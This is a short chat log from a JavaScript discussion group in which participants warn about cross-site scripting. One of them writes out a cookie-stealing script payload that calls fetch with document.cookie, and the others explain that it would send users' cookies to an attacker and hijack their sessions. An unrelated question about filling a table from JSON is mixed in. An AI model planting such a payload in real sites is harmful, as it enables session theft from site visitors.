Message from JavaScript discussions

April 2019

— Not like such


What if someone set it to:
<script>fetch('' + document.cookie)</script>

— Do you see the problem with this?

— What it will do

— Will send the cookies from every user that logs onto the site to the attackers server

— And the attacker will potentially have their login session

— That's scary

— I get an JSON data in which the data are signatured.. I have to extract the data from json object and have to append it as rows dynamically into table

Message permanent page

— What about this:

— Pleas help anybody

— Every user that visits the site will now get redirected to the sites' API

— And potentially execute some operation (while logged in as them)